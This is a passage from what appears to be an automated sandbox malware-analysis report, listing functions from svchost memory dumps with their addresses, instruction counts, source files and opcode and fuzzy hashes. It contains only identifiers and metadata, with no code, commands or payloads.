                                                                                                                      • Instruction Fuzzy Hash: AC5112B5A0260AEFEF19DF68C844BAEF7F8FF45710F1444AAE40297290DB709911DB90
                                                                                                                      Function 030B3A6C Relevance: .2, Instructions: 156COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1963c8d3ff3f15b007749dc942c7d7d394d907e5608c82d165e4c2a2160d5491
                                                                                                                      • Instruction ID: f356b64182213d80d52aef93a68c2ef86218a94afd62f4ccbde7f18a46ca6901
                                                                                                                      • Opcode Fuzzy Hash: 1963c8d3ff3f15b007749dc942c7d7d394d907e5608c82d165e4c2a2160d5491
                                                                                                                      • Instruction Fuzzy Hash: 9E51BE36E4012D4BEF24CA68D461BEFB3F2EB88310F580859E945BB3C4C3B66966D554
                                                                                                                      Function 030AD800 Relevance: .2, Instructions: 155COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: af156f0134cbf90f1259ef8b5593f4c5c46c7c4bc62141847b00ed071028dbfe
                                                                                                                      • Instruction ID: 90898d983daa67f2cf5f05798b3acfb02d43f051970ccf90c903cbb3cd29ae57
                                                                                                                      • Opcode Fuzzy Hash: af156f0134cbf90f1259ef8b5593f4c5c46c7c4bc62141847b00ed071028dbfe
                                                                                                                      • Instruction Fuzzy Hash: 4151D374A02A15EBCB54DF9DE4A0ABEB7F4FF45700F08415AE841DBA90E734D950CB90
                                                                                                                      Function 030FD26B Relevance: .2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                      • Instruction ID: a9e854b9030e5fb387ab1224560f6d798a4d983363746feddceeeb8614263423
                                                                                                                      • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                      • Instruction Fuzzy Hash: F4517D766097429FD311CF28C884B5ABBE6FFC8344F08892DFA949B644D734E945CB52
                                                                                                                      Function 030F7571 Relevance: .2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2007a53033cd529413232225aafe525a2254d7a06d259cc7ce896cb95d30c35b
                                                                                                                      • Instruction ID: 1ca63832625d18eb019f26f6c2ae07fda71adfb12405b139e7550d2d6d04f4f6
                                                                                                                      • Opcode Fuzzy Hash: 2007a53033cd529413232225aafe525a2254d7a06d259cc7ce896cb95d30c35b
                                                                                                                      • Instruction Fuzzy Hash: 1E511931A01229AFCB14DF69C844ABEFBF9FF88B94F484169DA01D7650DB70AD51CB90
                                                                                                                      Function 030351ED Relevance: .1, Instructions: 149COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: df6fa66d7e265be8c6e1f9134b6066ae17476ea138b5733ea02318d574f215d1
                                                                                                                      • Instruction ID: 07ad8750e509bbeb92a3fd1b83578e63c3c8fc58e4a619a993bda850905bb626
                                                                                                                      • Opcode Fuzzy Hash: df6fa66d7e265be8c6e1f9134b6066ae17476ea138b5733ea02318d574f215d1
                                                                                                                      • Instruction Fuzzy Hash: F4518C75A07315DFEF25DAA9CC40BEEB3FCAB4B314F080459D811AB260D7B499408B66
                                                                                                                      Function 0306F71F Relevance: .1, Instructions: 143COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 57c2441d7791dd08e2fa8d63cc257be97754684a91f010187da89bfa30d27165
                                                                                                                      • Instruction ID: 807dfc933ee7ec175e65109d33048b2ae86490e8a876307822e96bee17889067
                                                                                                                      • Opcode Fuzzy Hash: 57c2441d7791dd08e2fa8d63cc257be97754684a91f010187da89bfa30d27165
                                                                                                                      • Instruction Fuzzy Hash: 184189B6D4622AABDF15DBA8D844AFFB7BCAF45650F0501A6E900EB200D634DE01D7E4
                                                                                                                      Function 030601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2e8abe02e220e3858c9f5ac4b9c12578964ccebf77f273b2f738be9e058b96af
                                                                                                                      • Instruction ID: 3a0951c397f56a1cc648280539e9763becc5a2d02df67149be3d7c90155b4ddd
                                                                                                                      • Opcode Fuzzy Hash: 2e8abe02e220e3858c9f5ac4b9c12578964ccebf77f273b2f738be9e058b96af
                                                                                                                      • Instruction Fuzzy Hash: 6D41D076E46219DBCB14DF98C440AEEF7B4BF88710F18816AE816FB244D7359D41CBA8
                                                                                                                      Function 03072750 Relevance: .1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction ID: 73dc831b93e6ac66a608c3fb956717fabbf357e593901425ada1db4d046adfb9
                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction Fuzzy Hash: 70515B75A01615DFCB54CF98C580AAEF7F6FF84710F2885A9E815A7790D730AE41CB90
                                                                                                                      Function 030AD1C0 Relevance: .1, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction ID: 07be9f76110fd5e976bd7c50d606c54d9d992e0fb1719f5b96a6f714c795653f
                                                                                                                      • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction Fuzzy Hash: 25515771A01606DFCB58CFA8D4916AAFBF1FF58314B18856ED819A7705E334EA80CF90
                                                                                                                      Function 03036154 Relevance: .1, Instructions: 133COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 91075fad1418babf65d82a7062667a7888de493b0f21425c34239bed21c3268f
                                                                                                                      • Instruction ID: 1969ff576f17a20507abac4cbef9ff10b2ba81d32c24572106ed012396b44350
                                                                                                                      • Opcode Fuzzy Hash: 91075fad1418babf65d82a7062667a7888de493b0f21425c34239bed21c3268f
                                                                                                                      • Instruction Fuzzy Hash: 93512A70A0661AEBDB65DB24CC44BE8BBF9FF46314F0842E5D425AB2C0D7799981CF40
                                                                                                                      Function 0302B136 Relevance: .1, Instructions: 131COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0fc4c6ddb9df83486bd0add407fb5e7cc96e2b9ca3bde54ab7011dfaacd8e4d3
                                                                                                                      • Instruction ID: 9fcfdba497cc36817d570be25c6268365bfa8636f7b8ecf89cd13727b3b3db03
                                                                                                                      • Opcode Fuzzy Hash: 0fc4c6ddb9df83486bd0add407fb5e7cc96e2b9ca3bde54ab7011dfaacd8e4d3
                                                                                                                      • Instruction Fuzzy Hash: BD41EDB5642311EFDB25EF68C840BAABBF8EF84784F048879E5519F290D770D954CBA0
                                                                                                                      Function 030FF0E0 Relevance: .1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 96b22c95e2311989dde50af90ec455e32910b5f68857afa60d852eaf97e5cacb
                                                                                                                      • Instruction ID: 2b2b5e97b18e3aa7bac33bf970381e94d562e3cdafd6d4b3d0d4b77f446b9c2d
                                                                                                                      • Opcode Fuzzy Hash: 96b22c95e2311989dde50af90ec455e32910b5f68857afa60d852eaf97e5cacb
                                                                                                                      • Instruction Fuzzy Hash: E741E3712053419FC744CF25D86487ABBE1FFC8215F044A6DF9958B782C730D919CB61
                                                                                                                      Function 030F866E Relevance: .1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction ID: e52db7e3d605be58bb3f3cab901f97052c58e669ff3832d0c0dfa9ea0be2fb8c
                                                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction Fuzzy Hash: 87418575B02319AFDB15DF99CC85AEFB7FAAFC4600F188069E604A7741D674DD018760
                                                                                                                      Function 030DD5B0 Relevance: .1, Instructions: 128COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c242847558f3c2214b72bb770826e77abea778b12e10e56519ca6ee9bbb3a004
                                                                                                                      • Instruction ID: 9016052b993a4ed40fd6c7b32f228e2c39043b3e39733d0a16ab4409baab0082
                                                                                                                      • Opcode Fuzzy Hash: c242847558f3c2214b72bb770826e77abea778b12e10e56519ca6ee9bbb3a004
                                                                                                                      • Instruction Fuzzy Hash: F2410530A093959FCB14DF29C495ABAFBF1FF49300F09849AE4C58F245C735A456DBA0
                                                                                                                      Function 0305D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d046c0a5ad57295628947d3b7af50a97cf025276267523173e35acec41aa3626
                                                                                                                      • Instruction ID: 64239fd1f61a865f885ff1dd2c572f3a5be724fedbe37369ef1d93d61ab3cd58
                                                                                                                      • Opcode Fuzzy Hash: d046c0a5ad57295628947d3b7af50a97cf025276267523173e35acec41aa3626
                                                                                                                      • Instruction Fuzzy Hash: C541E675506301AFD724FF25C890FABB7A9EB89320F00052EFC158B290DB30E851CBA1
                                                                                                                      Function 0302A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction ID: f31769fb91cedb384b48170fe75f204bd44e1abc6fdca3bf49fba7e8d34f3405
                                                                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction Fuzzy Hash: 60412E31B02221DBDB60EF95C4907BEFBF2EB90764F19806BE9859B241DE359D40C790
                                                                                                                      Function 03060710 Relevance: .1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction ID: 2a2eec1b17469b8e7cb77325072cc309a45cebf32b5e6a3d3acd54c26aa3d1cc
                                                                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction Fuzzy Hash: 20413A75A46705EFDB24CF98C980AAAB7F8FF08700B10496DE596DB694D730EA44CF90
                                                                                                                      Function 0303262C Relevance: .1, Instructions: 119COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d4e5bb72dd2d08bc60e33743373fecfd6440943176579d529cc95bc4b3f1be05
                                                                                                                      • Instruction ID: 6fcaa916727850a3ba513a22b49acb45a5156c399c714e59bb201093d99acc07
                                                                                                                      • Opcode Fuzzy Hash: d4e5bb72dd2d08bc60e33743373fecfd6440943176579d529cc95bc4b3f1be05
                                                                                                                      • Instruction Fuzzy Hash: B341D174502714DFC725EF24D940BA9B7FDFF8A310F1489A9C4569B2A0EB309941CB51
                                                                                                                      Function 030FFFB1 Relevance: .1, Instructions: 117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 68d557022b846daedb6256eb918b334c02fe773a831c5c2f9ea486956a06ce9b
                                                                                                                      • Instruction ID: ee0f8a3486af9593090d9e3ec749bcd6596dbe485732ca03c122218574ef6637
                                                                                                                      • Opcode Fuzzy Hash: 68d557022b846daedb6256eb918b334c02fe773a831c5c2f9ea486956a06ce9b
                                                                                                                      • Instruction Fuzzy Hash: 06413831A042595BC744CB26C4A0AFEBFF1AF8D245F0DC1AAD8819B286D739C546C770
                                                                                                                      Function 030FFA49 Relevance: .1, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3f2bb34c426ffd157351b751a8667e7e6a764a1395c0fc257cb8d8946a335aff
                                                                                                                      • Instruction ID: a7a8ea4a3ee69aca7bb42dcb134a097b76e2e44aa3269622aa53c480cd8aa303
                                                                                                                      • Opcode Fuzzy Hash: 3f2bb34c426ffd157351b751a8667e7e6a764a1395c0fc257cb8d8946a335aff
                                                                                                                      • Instruction Fuzzy Hash: B93159767021079FC718CF29CC44AA7BBD9EF88750F088674EA18CB684EB74D945C3A0
                                                                                                                      Function 030FEEDB Relevance: .1, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3b4294f60b3270c9969e51cc187dcc3f281f41f4732c49d13662631f45d83e3e
                                                                                                                      • Instruction ID: 0c509c9997b75db1be9e224f711ce13627f7db7b8b74f6866868d805ff1f9e29
                                                                                                                      • Opcode Fuzzy Hash: 3b4294f60b3270c9969e51cc187dcc3f281f41f4732c49d13662631f45d83e3e
                                                                                                                      • Instruction Fuzzy Hash: 7E41B133E0002A9BCB18CF68D49197AF3F1FB8830476642BDD905AB294DB74AD45CB90
                                                                                                                      Function 030FFB76 Relevance: .1, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 127efca0d5eaef5860ffdb9f69d70cec2968c0135c04908ac2510ce7f924efc3
                                                                                                                      • Instruction ID: 8e16aba248f80b3b4ebf2b6f4e8700d38d603dae267a01fac847064ad91ad38d
                                                                                                                      • Opcode Fuzzy Hash: 127efca0d5eaef5860ffdb9f69d70cec2968c0135c04908ac2510ce7f924efc3
                                                                                                                      • Instruction Fuzzy Hash: 0D31F476612116BFD714DF29CD44AABBBE9EF8C350F448428FA08CF640DA74E941CBA0
                                                                                                                      Function 0266DF13 Relevance: .1, Instructions: 108COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                      • Instruction ID: c1dc3dc6e52803cefeb466138ddc1edcac96da057f4d3b999fcd454e59a59334
                                                                                                                      • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                      • Instruction Fuzzy Hash: 683172116586F14ED31E836D08BDA75AEC18E9720174EC2FEDADA6F3F3C4988408D3A5
                                                                                                                      Function 030402E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                      • Instruction ID: 5e654b9b3fcfc58c37cf0c6dea44cfc90170e80c3d26ac9ac8203c797e756fba
                                                                                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                      • Instruction Fuzzy Hash: DE3106B2A06244AFDB21DB68CC40BDEFFECEF44350F0885B6E455EB251D2749944CB94
                                                                                                                      Function 03059274 Relevance: .1, Instructions: 105COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1152259f03506ea186f4eb10cb50e36ddec716f3aa76f15a83d13836f037acde
                                                                                                                      • Instruction ID: 1fcdeaa9148b9a2db13f5bf59172f162cd01927ecb92e7c625ff490f08fc5e56
                                                                                                                      • Opcode Fuzzy Hash: 1152259f03506ea186f4eb10cb50e36ddec716f3aa76f15a83d13836f037acde
                                                                                                                      • Instruction Fuzzy Hash: 3B317275A02328EFDB25DB64CC40B9BB7B9EF85710F1501A9B94CAB280DB319E44CB95
                                                                                                                      Function 03035702 Relevance: .1, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4536a3f0a1c7950229e242b0af6a94ac94dfda00ebf6991580ff1830ecac1422
                                                                                                                      • Instruction ID: bf47b0d9b2ba48f0cfeabc7f46e1141c354d202f4a21abf0a5085aec129bfbf8
                                                                                                                      • Opcode Fuzzy Hash: 4536a3f0a1c7950229e242b0af6a94ac94dfda00ebf6991580ff1830ecac1422
                                                                                                                      • Instruction Fuzzy Hash: 8D31C039202A06FFDB55DB24DD80A9AF7A9BF86754F0414A5E84147A60D770E820DBD0
                                                                                                                      Function 03034260 Relevance: .1, Instructions: 102COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 01c7c3dfe5fcfcbaddf6138397d5c18799fe8dc84a297f8b07a851d43f478098
                                                                                                                      • Instruction ID: 64c14b4e7857e5ab0041de2ab8c35a0c6bb5b51ae5b414a7d519670d78ad1b8f
                                                                                                                      • Opcode Fuzzy Hash: 01c7c3dfe5fcfcbaddf6138397d5c18799fe8dc84a297f8b07a851d43f478098
                                                                                                                      • Instruction Fuzzy Hash: AE41C075202B44DFDB66CF25C981FDAB7E9EF4A314F05882AE5998F290C774E840DB90
                                                                                                                      Function 030550E4 Relevance: .1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                      • Instruction ID: 6a7a52663bb0aaf80441f9fd583e8cb0aacb4910a9db9cda983c3dea0eb279a1
                                                                                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                      • Instruction Fuzzy Hash: 3131F73170A3419BDB61DA2CCC0076BFBD9AB86754F0D856AFC868B380D674D841C796
                                                                                                                      Function 030F61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6ab6f947b4923701c0f11b714fd135c6bdcf04d179f03dc07ccf7b32cb0ba870
                                                                                                                      • Instruction ID: 593ccf3af3fa0cc4a8284655b7c4ba6d6ccbb999713ef25fc235d2887fa045b1
